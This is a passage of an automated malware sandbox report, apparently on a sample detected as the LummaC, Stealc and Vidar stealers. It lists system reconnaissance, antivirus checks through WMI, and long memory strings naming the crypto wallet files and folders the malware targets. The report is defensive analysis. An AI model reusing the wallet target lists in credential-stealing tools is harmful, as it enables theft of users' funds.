Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_004275EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_004276C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429EBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E7F4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Queries volume information: C:\ProgramData\KECBKKEBKE.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Queries volume information: C:\ProgramData\EGDGCGCFHI.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Queries volume information: C:\ProgramData\DBGIJEHIID.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\userGIEGHJEGHJ.exe	Queries volume information: C:\Users\userGIEGHJEGHJ.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\userIJEGDBGDBF.exe	Queries volume information: C:\Users\userIJEGDBGDBF.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C110 lstrcpyA,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,

3_2_0041C110

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3023059126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2576073985.00000000039C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia 